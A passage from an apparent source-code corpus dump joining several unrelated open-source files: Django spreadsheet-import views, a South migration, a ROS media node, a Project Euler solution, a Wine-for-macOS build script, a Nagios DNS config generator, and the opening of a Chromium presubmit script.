'search_field': search_field,
'create_new_cases': create_new_cases,
'key_column': key_column,
'value_column': value_column,
'columns': columns,
'excel_fields': excel_fields,
'case_fields': case_fields,
'domain': domain,
'report': {
'name': 'Import: Match columns to fields'
},
'slug': base.ImportCases.slug})
@require_POST
@require_can_edit_data
def excel_commit(request, domain):
config = importer_util.ImporterConfig.from_request(request)
excel_id = request.session.get(EXCEL_SESSION_ID)
excel_ref = DownloadBase.get(excel_id)
spreadsheet = importer_util.get_spreadsheet(excel_ref, config.named_columns)
if not spreadsheet:
return _spreadsheet_expired(request, domain)
if spreadsheet.has_errors:
messages.error(request, _('The session containing the file you '
'uploaded has expired - please upload '
'a new one.'))
return HttpResponseRedirect(base.ImportCases.get_url(domain=domain) + "?error=cache")
download = DownloadBase()
download.set_task(bulk_import_async.delay(
download.download_id,
config,
domain,
excel_id,
))
try:
del request.session[EXCEL_SESSION_ID]
except KeyError:
pass
return render(request, "importer/excel_commit.html", {
'download_id': download.download_id,
'template': 'importer/partials/import_status.html',
'domain': domain,
'report': {
'name': 'Import: Completed'
},
'slug': base.ImportCases.slug})
@require_can_edit_data
def importer_job_poll(request, domain, download_id, template="importer/partials/import_status.html"):
download_data = DownloadBase.get(download_id)
is_ready = False
if download_data is None:
download_data = DownloadBase(download_id=download_id)
try:
if download_data.task.failed():
return HttpResponseServerError()
except (TypeError, NotImplementedError):
# no result backend / improperly configured
pass
alive = True
if heartbeat_enabled():
alive = is_alive()
context = RequestContext(request)
if download_data.task.result and 'error' in download_data.task.result:
error = download_data.task.result['error']
if error == 'EXPIRED':
return _spreadsheet_expired(request, domain)
elif error == 'HAS_ERRORS':
messages.error(request, _('The session containing the file you '
'uploaded has expired - please upload '
'a new one.'))
return HttpResponseRedirect(base.ImportCases.get_url(domain=domain) + "?error=cache")
if download_data.task.state == 'SUCCESS':
is_ready = True
context['result'] = download_data.task.result
context['is_ready'] = is_ready
context['is_alive'] = alive
context['progress'] = download_data.get_progress()
context['download_id'] = download_id
return render_to_response(template, context_instance=context)
def _spreadsheet_expired(req, domain):
messages.error(req, _('Sorry, your session has expired. Please start over and try again.'))
return HttpResponseRedirect(base.ImportCases.get_url(domain))
| bsd-3-clause | 287,405,050,665,804,160 | 39.511194 | 101 | 0.590771 | false |
brianloveswords/webpagemaker | webpagemaker/api/migrations/0004_lowercase_short_url_ids.py | 1 | 1316 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
NUMERALS = "3fldc4mzjyqr7bkug5vh0a68xpon9stew12i"
def rebase(num, numerals=NUMERALS):
base = len(numerals)
left_digits = num // base
if left_digits == 0:
return numerals[num % base]
else:
return rebase(left_digits, numerals) + numerals[num % base]
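# Worked example (computed from NUMERALS above, a 36-symbol alphabet, so this
# is base-36 encoding with a shuffled digit order):
#   rebase(1)  -> 'f'
#   rebase(36) -> 'f3'
#   rebase(37) -> 'ff'
# The migration below sets each Page's short_url_id to rebase(page.id).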
class Migration(DataMigration):
def forwards(self, orm):
"Write your forwards methods here."
for page in orm.Page.objects.all():
page.short_url_id = rebase(page.id)
page.save()
def backwards(self, orm):
"Write your backwards methods here."
raise RuntimeError("Cannot go back.")
models = {
'api.page': {
'Meta': {'object_name': 'Page'},
'html': ('django.db.models.fields.TextField', [], {'max_length': '10000'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'original_url': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'}),
'short_url_id': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'})
}
}
complete_apps = ['api']
symmetrical = True
| mpl-2.0 | 162,472,665,847,516,580 | 31.9 | 126 | 0.587386 | false |
EndPointCorp/lg_ros_nodes | lg_media/scripts/browser_player.py | 1 | 1133 | #!/usr/bin/env python3
import rospy
from lg_msg_defs.msg import AdhocMedias
from lg_media import DirectorMediaBridge
from interactivespaces_msgs.msg import GenericMessage
from lg_common.helpers import handle_initial_state
from lg_common.helpers import run_with_influx_exception_handler
DEFAULT_VIEWPORT = 'center'
MEDIA_TYPE = 'browser_video'
VIDEOSYNC_URL = 'http://lg-head/lg_sv/webapps/videosync'
NODE_NAME = 'lg_media_service_browser_player'
def main():
rospy.init_node(NODE_NAME, anonymous=True)
viewport_name = rospy.get_param('~viewport', DEFAULT_VIEWPORT)
topic_name = '/media_service/browser/%s' % viewport_name
adhoc_media_publisher = rospy.Publisher(topic_name, AdhocMedias,
queue_size=3)
director_bridge = DirectorMediaBridge(adhoc_media_publisher, viewport_name, MEDIA_TYPE)
rospy.Subscriber('/director/scene', GenericMessage,
director_bridge.translate_director)
handle_initial_state(director_bridge.translate_director)
rospy.spin()
if __name__ == '__main__':
run_with_influx_exception_handler(main, NODE_NAME)
| apache-2.0 | 6,909,703,112,144,728,000 | 34.40625 | 91 | 0.713151 | false |
paulmcquad/projecteuler | 0-100/problem31.py | 1 | 1448 | #http://users.softlab.ntua.gr/~ttsiod/euler31.html
#!/usr/bin/env python
# the 8 coins correspond to 8 columns
coins = [1, 2, 5, 10, 20, 50, 100, 200]
TARGET=200
matrix = {}
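# Worked example of the recurrence below with a reduced coin set [1, 2] and
# target 3: matrix[y, 0] = 1 for every y (only 1-cent coins), and
# matrix[3, 1] = matrix[3, 0] + matrix[3 - 2, 1] = 1 + 1 = 2,
# i.e. {1,1,1} and {1,2}. The answer to the problem is matrix[TARGET, 7].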
for y in xrange(0, TARGET+1):
# There is only one way to form a target sum N
# via 1-cent coins: use N 1-cents!
matrix[y, 0] = 1 # equivalent to matrix[(y,0)]=1
for y in xrange(0, TARGET+1):
print y, ":", 1,
for x in xrange(1, len(coins)):
matrix[y, x] = 0
# Is the target big enough to accomodate coins[x]?
if y>=coins[x]:
# If yes, then the number of ways to form
# the target sum are obtained via:
#
# (a) the number of ways to form this target
# using ONLY coins less than column x
# i.e. matrix[y][x-1]
matrix[y, x] += matrix[y, x-1]
# plus
# (b) the number of ways to form this target
# when USING the coin of column x
# which means for a remainder of y-coins[x]
# i.e. matrix[y-coins[x]][x]
matrix[y, x] += matrix[y-coins[x], x]
else:
# if the target is not big enough to allow
# usage of the coin in column x,
# then just copy the number of ways from the
# column to the left (i.e. with smaller coins)
matrix[y, x] = matrix[y, x-1]
print matrix[y, x],
print
| gpl-3.0 | -9,069,959,849,210,606,000 | 31.909091 | 59 | 0.529006 | false |
mattintosh4/nihonshu | build.py | 1 | 25063 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from subprocess import *
import os
import re
import sys
import shutil
INSTALL_ROOT = '/usr/local/wine'
PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))
DEPOSROOT = os.path.join(PROJECT_ROOT, 'depos')
SRCROOT = os.path.join(PROJECT_ROOT, 'src')
PATCHROOT = os.path.join(PROJECT_ROOT, 'osx-wine-patch')
BUILDROOT = os.path.join(os.path.expandvars('$TMPDIR'), 'build', 'wine')
W_PREFIX = INSTALL_ROOT
W_BINDIR = os.path.join(W_PREFIX, 'bin')
W_DATADIR = os.path.join(W_PREFIX, 'share')
W_DOCDIR = os.path.join(W_DATADIR, 'doc')
W_INCDIR = os.path.join(W_PREFIX, 'include')
W_LIBDIR = os.path.join(W_PREFIX, 'lib')
W_LIBEXECDIR = os.path.join(W_PREFIX, 'libexec')
PREFIX = os.path.join(W_PREFIX, 'SharedSupport')
BINDIR = os.path.join(PREFIX, 'bin')
SBINDIR = os.path.join(PREFIX, 'sbin')
DATADIR = os.path.join(PREFIX, 'share')
DOCDIR = os.path.join(DATADIR, 'doc')
INCDIR = os.path.join(PREFIX, 'include')
LIBDIR = os.path.join(PREFIX, 'lib')
SYSCONFDIR = os.path.join(PREFIX, 'etc')
def message(strings, color = 'green'):
color = {
'red' : 31,
'green' : 32,
'orange': 33,
}[color]
print >> sys.stdout, """\033[{color}m*** {strings} ***\033[m""".format(**locals().copy())
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
message('created: ' + path)
def rm(path):
if not os.path.exists(path): return
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
message('removed: ' + path, 'red')
def installFile(src, dst, mode = 0644):
makedirs(os.path.dirname(dst))
shutil.copy(src, dst)
os.chmod(dst, mode)
message('installed: %s -> %s' % (src, dst))
def installDoc(name, *args):
docdir = os.path.join(W_DOCDIR, name)
makedirs(docdir)
for f in args:
installFile(os.path.join(BUILDROOT, name, f),
os.path.join(docdir, os.path.basename(f)))
#-------------------------------------------------------------------------------
not os.path.exists(BUILDROOT) or rm(BUILDROOT)
not os.path.exists(W_PREFIX) or rm(W_PREFIX)
for f in [
DEPOSROOT,
BUILDROOT,
W_BINDIR,
W_DATADIR,
W_INCDIR,
W_LIBDIR,
W_LIBEXECDIR,
os.path.join(W_DATADIR, "wine", "plugin", "inf"),
BINDIR,
SBINDIR,
DATADIR,
DOCDIR,
INCDIR,
SYSCONFDIR,
]:
makedirs(f)
os.symlink(W_LIBDIR, LIBDIR)
import build_preset as my
my.PREFIX = PREFIX
my.main()
GCC = my.GCC
GXX = my.GXX
CLANG = my.CLANG
CLANGXX = my.CLANGXX
P7ZIP = my.P7ZIP
get_stdout = my.get_stdout
vsh = my.vsh
cabextract = my.cabextract
git_checkout = my.git_checkout
hg_update = my.hg_update
p7zip = my.p7zip
autotools = my.Autotools()
autogen = autotools.autogen
autoreconf = autotools.autoreconf
#-------------------------------------------------------------------------------
class BuildCommands(object):
def __init__(self):
global ncpu
global triple
ncpu = str(int(int(get_stdout('sysctl', '-n', 'hw.ncpu')) * 1.5))
triple = 'i686-apple-darwin' + os.uname()[2]
def reposcopy(self, name):
src = os.path.join(PROJECT_ROOT, 'src', name)
dst = os.path.join(BUILDROOT, name)
shutil.copytree(src, dst, True)
os.chdir(dst)
def configure(self, *args, **kwargs):
pre_args = (
'--enable-shared',
'--disable-dependency-tracking'
)
kwargs.setdefault('prefix', PREFIX)
kwargs.setdefault('triple', triple)
kwargs.setdefault('args', ' '.join(pre_args + args))
vsh(
"""
./configure --prefix={prefix} --build={triple} {args}
""".format(**kwargs))
def make_install(self, **kwargs):
kwargs.setdefault('archive', False)
kwargs.setdefault('check', False)
kwargs.setdefault('parallel', True)
kwargs.setdefault('make', 'make -j {0}'.format(ncpu))
kwargs.setdefault('make_check', 'make check')
kwargs.setdefault('make_args', '')
kwargs['parallel'] or kwargs.update(make = 'make')
kwargs['check'] or kwargs.update(make_check = ':')
vsh('{make} {make_args} && {make_check} && make install'.format(**kwargs))
if kwargs['archive'] is not False:
binMake(kwargs['archive'])
def patch(self, *args):
for f in args:
vsh('patch -Np1 < {0}'.format(f))
buildCommands = BuildCommands()
reposcopy = buildCommands.reposcopy
configure = buildCommands.configure
make_install = buildCommands.make_install
patch = buildCommands.patch
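# Typical recipe pattern shared by the build_* functions further down
# ('foo' is a placeholder package name):
#
#     def build_foo(name='foo'):
#         message(name)
#         if binCheck(name): return      # reuse a cached tarball from depos/
#         reposcopy(name)                # copy src/<name> into BUILDROOT
#         configure('--disable-static')
#         make_install(archive=name)     # build, install, then cache via binMake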
def extract(name, ext, dirname = ''):
d = dict(
dstroot = BUILDROOT,
srcroot = SRCROOT,
f = name + ext,
p7zip = P7ZIP,
)
if ext.endswith('.xz'):
cmd = """{p7zip} x -so {srcroot}/{f} | tar xf - -C {dstroot}""".format(**d)
else:
cmd = """tar xf {srcroot}/{f} -C {dstroot}""".format(**d)
vsh(cmd)
if dirname:
os.chdir(os.path.join(BUILDROOT, dirname))
else:
os.chdir(os.path.join(BUILDROOT, name))
print >> sys.stderr, os.getcwd()
def binMake(name):
srcroot = BUILDROOT
dstroot = DEPOSROOT
vsh(
"""
tar czf {dstroot}/{name}.tar.gz \
--exclude=".git*" \
--exclude=".svn*" \
--exclude=".hg*" \
-C {srcroot} {name}
""".format(**locals().copy()))
def binCheck(name):
srcroot = DEPOSROOT
dstroot = BUILDROOT
if not os.path.exists(os.path.join(srcroot, name + '.tar.gz')): return False
vsh(
"""
tar xf {srcroot}/{name}.tar.gz -C {dstroot}
cd {dstroot}/{name}
make install
""".format(**locals().copy()))
return True
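# binMake/binCheck implement a simple build cache: binMake tars the built
# source tree into depos/, and on a later run binCheck re-extracts that tarball
# and only runs `make install`, which is why each build_* recipe starts with
# `if binCheck(name): return`.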
#-------------------------------------------------------------------------------
def install_core_resources():
# note install project license
f = 'LICENSE'
installFile(os.path.join(PROJECT_ROOT, f),
os.path.join(W_DOCDIR, 'nihonshu', f))
# note: install python module
f = 'createwineprefix.py'
os.link(os.path.join(PROJECT_ROOT, f),
os.path.join(W_BINDIR, f))
# note: install inf
f = 'osx-wine.inf'
os.link(os.path.join(PROJECT_ROOT, 'osx-wine-inf', f),
os.path.join(W_DATADIR, 'wine/plugin/inf', f))
def install_plugin():
def install_plugin_7z():
src = os.path.join(PROJECT_ROOT, 'rsrc/7z922.exe')
dst = os.path.join(destroot, '7-Zip')
p7zip('x', '-o' + dst, src, '-x!$*')
src = os.path.join(PROJECT_ROOT, 'inf/7z.inf')
dst = os.path.join(destroot, 'inf/7z.inf')
installFile(src, dst)
def install_plugin_vsrun6():
src = os.path.join(PROJECT_ROOT, 'rsrc/vsrun6sp6/Vs6sp6.exe')
# Visual Basic 6.0 SP 6 ------------------------------------------------
dst = os.path.join(destroot, 'vbrun6sp6')
sub_src = 'vbrun60.cab'
cabextract('-L', '-d', dst, '-F', sub_src, src)
sub_src = os.path.join(dst, sub_src)
cabextract('-L', '-d', dst, sub_src)
os.remove(sub_src)
# Visual C++ 6.0 SP 6 --------------------------------------------------
dst = os.path.join(destroot, 'vcrun6sp6')
sub_src = 'vcredist.exe'
cabextract('-L', '-d', dst, '-F', sub_src, src)
destroot = os.path.join(W_DATADIR, 'wine/plugin')
dx9_feb2010 = os.path.join(PROJECT_ROOT, 'rsrc/directx9/directx_feb2010_redist.exe')
dx9_jun2010 = os.path.join(PROJECT_ROOT, 'rsrc/directx9/directx_Jun2010_redist.exe')
vcrun2005 = os.path.join(PROJECT_ROOT, 'rsrc/vcrun2005sp1_jun2011')
vcrun2008 = os.path.join(PROJECT_ROOT, 'rsrc/vcrun2008sp1_jun2011')
vcrun2010 = os.path.join(PROJECT_ROOT, 'rsrc/vcrun2010sp1_aug2011')
makedirs(destroot)
# INSTALL RUNTIME ----------------------------------------------------------
p7zip('x', '-o' + os.path.join(destroot, 'directx9/feb2010'), dx9_feb2010, '-x!*_x64.cab')
p7zip('x', '-o' + os.path.join(destroot, 'directx9/jun2010'), dx9_jun2010, '-x!*_x64.cab', '-x!*200?*', '-x!Feb2010*')
shutil.copytree(vcrun2005, os.path.join(destroot, 'vcrun2005sp1_jun2011'))
shutil.copytree(vcrun2008, os.path.join(destroot, 'vcrun2008sp1_jun2011'))
shutil.copytree(vcrun2010, os.path.join(destroot, 'vcrun2010sp1_aug2011'))
install_plugin_vsrun6()
install_plugin_7z()
# INSTALL INF --------------------------------------------------------------
for f in [
'inf/dxredist.inf',
'inf/vsredist.inf',
'inf/win2k.reg',
'inf/winxp.reg',
]:
src = os.path.join(PROJECT_ROOT, f)
dst = os.path.join(destroot, 'inf')
dst = os.path.join(dst, os.path.basename(f))
installFile(src, dst)
#-------------------------------------------------------------------------------
# FREETYPE ---------------------------------------------------------------------
def build_freetype(name = 'freetype'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
autogen()
configure(
'--with-old-mac-fonts',
)
make_install(archive = name)
# GETTEXT ----------------------------------------------------------------------
def build_gettext(name = 'gettext-0.18.3.1'):
message(name)
if binCheck(name): return
extract(name, '.tar.gz')
configure(
'--disable-csharp',
'--disable-java',
'--disable-native-java',
'--disable-openmp',
'--enable-threads=posix',
'--with-included-gettext',
'--with-included-glib',
        '--with-included-libcroco',
'--with-included-libunistring',
'--without-cvs',
'--without-emacs',
'--without-git',
)
make_install(archive = name)
# GLIB -------------------------------------------------------------------------
def build_glib(name = 'glib'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout('glib-2-38')
autogen()
configure(
'--disable-fam',
'--disable-selinux',
'--disable-silent-rules',
'--disable-xattr',
'--with-threads=posix',
)
make_install(archive = name)
# GMP --------------------------------------------------------------------------
def build_gmp(name = 'gmp-5.1'):
message(name)
if binCheck(name): return
reposcopy(name)
hg_update()
autoreconf()
vsh(
"""
grep '^@set' .bootstrap > doc/version.texi
unset CFLAGS CXXFLAGS
./configure --prefix={prefix} ABI=32
""".format(
prefix = PREFIX,
))
make_install(check = True, archive = name)
# GNUTLS -----------------------------------------------------------------------
def build_libtasn1(name = 'libtasn1-3.3'):
message(name)
if binCheck(name): return
extract(name, '.tar.gz')
configure(
'--disable-gtk-doc',
'--disable-gtk-doc-html',
'--disable-gtk-doc-pdf',
'--disable-silent-rules',
'--disable-static',
)
make_install(archive = name)
def build_nettle(name = 'nettle-2.7.1'):
message(name)
if binCheck(name): return
extract(name, '.tar.gz')
configure(
'--disable-documentation',
)
make_install(archive = name)
# note: gnutls will fail depending on nettle version.
def build_gnutls(name = 'gnutls'):
build_libtasn1()
build_nettle()
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout(branch = 'gnutls_3_1_x')
autotools.make(
'autoreconf',
)
configure(
'--disable-doc',
'--disable-gtk-doc',
'--disable-gtk-doc-html',
'--disable-gtk-doc-pdf',
'--disable-nls',
'--disable-silent-rules',
'--disable-static',
'--enable-threads=posix',
)
make_install(archive = name)
# GSM --------------------------------------------------------------------------
def build_gsm(name = 'gsm-1.0.13'):
message(name)
extract(name, '.tar.gz', 'gsm-1.0-pl13')
vsh(
"""
make {install_name} \
CC='{cc} -ansi -pedantic' \
CCFLAGS='-c {cflags} -DNeedFunctionPrototypes=1' \
LDFLAGS='{ldflags}' \
LIBGSM='{install_name}' \
AR='{cc}' \
ARFLAGS='-dynamiclib -fPIC -v -arch i386 -install_name $(LIBGSM) -compatibility_version 1 -current_version 1.0.3 -o' \
RANLIB=':' \
RMFLAGS='-f'
install -m 0644 inc/gsm.h {prefix}/include
""".format(
prefix = PREFIX,
cc = os.getenv('CC'),
cflags = os.getenv('CFLAGS'),
ldflags = os.getenv('LDFLAGS'),
install_name = os.path.join(LIBDIR, 'libgsm.dylib'),
))
# LIBFFI -----------------------------------------------------------------------
def build_libffi(name = 'libffi'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
configure()
make_install(archive = name)
# LIBGPHOTO2 -------------------------------------------------------------------
def build_libexif(name = 'libexif-0.6.21'):
message(name)
if binCheck(name): return
extract(name, '.tar.bz2')
configure(
'--disable-docs',
'--disable-nls',
'--with-doc-dir=' + os.path.join(DOCDIR, name),
)
make_install(archive = name)
def build_popt(name = 'popt-1.14'):
message(name)
if binCheck(name): return
extract(name, '.tar.gz')
configure(
'--disable-nls',
)
make_install(archive = name)
def build_gd(name = 'libgd-2.1.0'):
message(name)
if binCheck(name): return
extract(name, '.tar.xz')
configure(
'--without-fontconfig',
'--without-x',
'--with-freetype=' + PREFIX,
'--with-jpeg=' + PREFIX,
'--with-png=' + PREFIX,
'--with-tiff=' + PREFIX,
'--with-zlib=' + PREFIX,
)
make_install(archive = name)
def build_libgphoto2(name = 'libgphoto2'):
build_libexif()
build_popt()
build_gd()
message(name)
if binCheck(name): return
reposcopy(name)
autoreconf(
'-s',
)
configure(
'--disable-nls',
'--with-drivers=all',
'CFLAGS="{cflags} -D_DARWIN_C_SOURCE"'.format(cflags = os.getenv('CFLAGS')),
)
make_install(archive = name)
# LIBJPEG-TURBO ----------------------------------------------------------------
def build_libjpeg_turbo(name = 'libjpeg-turbo'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout('1.3.x')
vsh(
"""
sed -i '' 's|$(datadir)/doc|&/libjpeg-turbo|' Makefile.am
""")
autoreconf()
configure(
'--with-jpeg8',
)
make_install(archive = name)
# LIBPNG -----------------------------------------------------------------------
def build_libpng(name = 'libpng'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout('libpng16')
autogen()
configure()
make_install(archive = name)
# LIBUSB -----------------------------------------------------------------------
def build_libusb(name = 'libusb'):
message(name)
if binCheck(name): return
reposcopy(name)
vsh(
"""
sed -i '' '/^.\\/configure/,$d' autogen.sh
""")
autogen()
configure()
make_install(archive = name)
build_libusb_compat()
def build_libusb_compat(name = 'libusb-compat-0.1'):
message(name)
if binCheck(name): return
reposcopy(name)
vsh(
"""
sed -i '' '/^.\\/configure/,$d' autogen.sh
""")
autogen()
configure()
make_install(archive = name)
# LIBTIFF ----------------------------------------------------------------------
def build_libtiff(name = 'libtiff'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout('branch-3-9')
configure(
'--disable-jbig',
'--disable-silent-rules',
'--without-x',
)
make_install(archive = name)
# LITTLE-CMS -------------------------------------------------------------------
def build_lcms(name = 'Little-CMS'):
message(name)
if binCheck(name): return
reposcopy(name)
configure()
make_install(archive = name)
# MPG123 -----------------------------------------------------------------------
# dependencies: SDL
#
def build_mpg123(name = 'mpg123'):
message(name)
if binCheck(name): return
reposcopy(name)
autoreconf()
configure(
'--with-default-audio=coreaudio',
'--with-optimization=0',
)
make_install(archive = name)
# READLINE ---------------------------------------------------------------------
def build_readline(name = 'readline'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
patch(os.path.join(PROJECT_ROOT, 'osx-wine-patch/readline.patch'))
configure(
'--enable-multibyte',
'--with-curses',
)
make_install(archive = name)
# SANE-BACKENDS ----------------------------------------------------------------
# dependencies: jpeg, libusb-compat, net-snmp, tiff, zlib
#
def build_net_snmp(name = 'net-snmp'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
configure(
'--with-defaults',
)
make_install(archive=name)
def build_sane(name = 'sane-backends'):
build_net_snmp()
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
configure(
'--disable-latex',
'--disable-maintainer-mode',
'--disable-silent-rules',
'--disable-translations',
'--enable-libusb_1_0',
'--enable-local-backends',
'--with-docdir=' + os.path.join(DOCDIR, name),
'--without-v4l',
)
make_install(archive = name)
# SDL --------------------------------------------------------------------------
def build_SDL(name = 'SDL'):
message(name)
if binCheck(name): return
reposcopy(name)
hg_update('SDL-1.2')
autogen()
configure()
make_install(archive = name)
# WINE -------------------------------------------------------------------------
def build_wine(name = 'wine'):
message(name)
if not binCheck(name):
reposcopy(name)
# git_checkout('wine-1.7.4')
git_checkout()
for f in os.listdir(PATCHROOT):
if f.startswith('wine_'):
patch(os.path.join(PATCHROOT, f))
configure(
'--without-capi',
'--without-oss',
'--without-v4l',
'--with-x',
'--x-inc=/opt/X11/include',
'--x-lib=/opt/X11/lib',
'CC=' + CLANG,
'CXX=' + CLANGXX,
'CFLAGS="-arch i386 %s"' % os.getenv('CFLAGS'),
'CXXFLAGS="-arch i386 %s"' % os.getenv('CXXFLAGS'),
prefix = W_PREFIX,
)
make_install(archive = name)
# note: add rpath
vsh("""install_name_tool -add_rpath /opt/X11/lib {W_BINDIR}/wine""".format(**globals()))
# note: rename executable
src = os.path.join(W_BINDIR, 'wine')
dst = os.path.join(W_LIBEXECDIR, 'wine')
os.rename(src, dst)
# note: install wine loader
src = os.path.join(PROJECT_ROOT, 'wineloader.py.in')
dst = os.path.join(W_BINDIR, 'wine')
with open(src, 'r') as i:
str = i.read()
str = str.replace('___CAPTION___', 'Nihonshu - Customized Wine binary for OS X (Ja)')
with open(dst, 'w') as o:
o.write(str)
os.chmod(dst, 0755)
installDoc(
name,
'ANNOUNCE',
'AUTHORS',
'COPYING.LIB',
'LICENSE',
'README',
)
# WINETRICKS / CABEXTRACT ------------------------------------------------------
def build_cabextract(name = 'cabextract-1.4'):
message(name)
extract(name, '.tar.gz')
configure(prefix = W_PREFIX)
make_install()
installDoc(
name,
'AUTHORS',
'COPYING',
'README',
)
def build_winetricks(name = 'winetricks'):
build_cabextract()
message(name)
reposcopy(name)
git_checkout("edit")
vsh("""make install PREFIX={W_PREFIX}""".format(**globals()))
### RENAME EXECUTABLE ###
os.rename(os.path.join(W_BINDIR, 'winetricks'),
os.path.join(W_LIBEXECDIR, 'winetricks'))
### INSTALL WINETRICKS LOADER ###
installFile(os.path.join(PROJECT_ROOT, 'winetricksloader.py'),
os.path.join(W_BINDIR, 'winetricks'),
0755)
installDoc(
name,
'src/COPYING',
)
# XZ ---------------------------------------------------------------------------
def build_xz(name = 'xz'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
autogen()
configure(
'--disable-nls',
'--disable-silent-rules',
)
make_install(archive = name)
# ZLIB -------------------------------------------------------------------------
def build_zlib(name = 'zlib'):
message(name)
if binCheck(name): return
reposcopy(name)
git_checkout()
vsh("""./configure --prefix={PREFIX}""".format(**globals()))
make_install(archive = name)
#-------------------------------------------------------------------------------
def create_distfile():
def create_distfile_clean():
rm(os.path.join(W_DATADIR, 'applications'))
for root, dirs, files in os.walk(W_LIBDIR):
if root == os.path.join(W_LIBDIR, 'wine'): continue
if root == W_LIBDIR:
for d in dirs:
d = os.path.join(root, d)
if d.endswith((
'gettext',
'gio',
'glib-2.0',
'libffi-3.0.13',
'pkgconfig',
)):
if os.path.exists(d):
rm(d)
for f in files:
f = os.path.join(root, f)
if f.endswith((
'.a',
'.la',
'.alias',
)):
if os.path.exists(f):
rm(f)
def create_distfile_core(distname):
src = W_PREFIX
dst = os.path.join(os.path.dirname(W_PREFIX), distname + '.exe')
if os.path.exists(dst): rm(dst)
p7zip('a', '-sfx', '-mx=9', dst, src)
def create_distfile_rebuild_shared_libdir():
rm(PREFIX)
makedirs(PREFIX)
os.symlink('../lib', LIBDIR)
#---------------------------------------------------------------------------
create_app = CreateApp()
os.chdir(os.path.dirname(INSTALL_ROOT))
create_distfile_clean()
create_distfile_rebuild_shared_libdir()
install_core_resources()
create_app.nihonshu()
    ### no-plugin ###
    create_distfile_core('wine_nihonshu_no-plugin')
    ### plugin ###
install_plugin()
create_app.sevenzip()
create_distfile_core('wine_nihonshu')
#-------------------------------------------------------------------------------
class CreateApp():
def __init__(self):
self.srcroot = os.path.join(PROJECT_ROOT, 'app')
self.approot = os.path.join(W_PREFIX, 'app')
makedirs(self.approot)
def install_app(self, name, src):
message(name)
vsh(
"""
osacompile -x -o {dst} {src}
""".format(
dst = os.path.join(self.approot, name),
src = os.path.join(self.srcroot, src),
))
def install_icon(self, name, src, suffix = 'Contents/Resources/droplet.icns'):
installFile(os.path.join(self.srcroot, src),
os.path.join(self.approot, name, suffix))
def install_plist(self, name, src, suffix = 'Contents/Info.plist'):
installFile(os.path.join(self.srcroot, src),
os.path.join(self.approot, name, suffix))
def nihonshu(self, name = 'Nihonshu.app'):
self.install_app( name, 'nihonshu.applescript')
self.install_plist(name, 'nihonshu.info.plist.in')
# todo
os.remove(os.path.join(self.approot, name, 'Contents/Resources/droplet.icns'))
def sevenzip(self, name = '7zFM.app'):
self.install_app( name, '7z.applescript')
self.install_icon( name, '7z.icns')
self.install_plist(name, '7z.info.plist.in')
#-------------------------------------------------------------------------------
if __name__ == '__main__':
os.system('declare')
build_zlib()
build_gsm()
build_xz()
build_gettext()
build_readline()
build_gmp()
build_libffi()
build_glib()
build_libusb()
build_gnutls()
build_libpng()
build_freetype()
build_libjpeg_turbo()
build_libtiff()
build_lcms()
build_libgphoto2()
build_sane()
build_SDL()
build_mpg123()
build_wine()
build_winetricks()
create_distfile()
os.system('echo done; afplay /System/Library/Sounds/Hero.aiff')
| gpl-3.0 | 7,017,750,207,364,745,000 | 26.878754 | 122 | 0.513865 | false |
savoirfairelinux/quebec-monitoring | scripts/dns.py | 1 | 2091 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
DNS = {
# Cogeco Cable (Trois-rivieres)
'cogeco.ca': ['205.151.69.200','205.151.68.200'],
# Videotron.CA
'videotron.ca': ['205.151.222.250', '205.151.222.251'],
# Colbanet
'colba.net': ['216.252.64.75', '216.252.64.76'],
}
template_host = (
"""
define host {
use generic-host
host_name %(host)s
address %(host)s
alias %(host)s
check_command check_dummy!0!OK
}
""")
template_service = (
"""
define service {
use generic-service
host_name %(host)s
check_command check_dig_service!%(ip)s!www.gouv.qc.ca
display_name %(host)s (%(ip)s)
service_description %(ip)s
servicegroups dns
labels order_%(order)d
}
""")
business_rule = (
"""
define host {
use generic-host
host_name dns
alias dns
check_command check_dummy!0!OK
}
define service {
use template_bprule
host_name dns
service_description dns
display_name DNS
notes Principaux serveurs DNS.
check_command bp_rule!%(all_dns)s
business_rule_output_template $(x)$
servicegroups main
icon_image fa-gears
}
""")
def main():
all_dns = []
order = 1
for host, ips in DNS.iteritems():
print template_host % {'host': host}
for ip in ips:
print template_service % {'host': host, 'ip': ip, 'order': order}
all_dns.append('%(host)s,%(ip)s' % {'host': host, 'ip': ip})
order += 1
print business_rule % {'all_dns': '&'.join(all_dns)}
if __name__ == '__main__':
main()
| agpl-3.0 | -6,103,445,619,368,963,000 | 27.256757 | 77 | 0.432329 | false |
paul99/clank | PRESUBMIT.py | 1 | 13362 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Top-level presubmit script for Chromium.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details about the presubmit API built into gcl.
"""
import re
_EXCLUDED_PATHS = (
r"^breakpad[\\\/].*",
r"^native_client_sdk[\\\/].*",
r"^net[\\\/]tools[\\\/]spdyshark[\\\/].*",
r"^skia[\\\/].*",
r"^v8[\\\/].*",
r".*MakeFile$",
)
_TEST_ONLY_WARNING = (
'You might be calling functions intended only for testing from\n'
'production code. It is OK to ignore this warning if you know what\n'
'you are doing, as the heuristics used to detect the situation are\n'
'not perfect. The commit queue will not block on this warning.\n'
'Email [email protected] if you have questions.')
def _CheckNoInterfacesInBase(input_api, output_api):
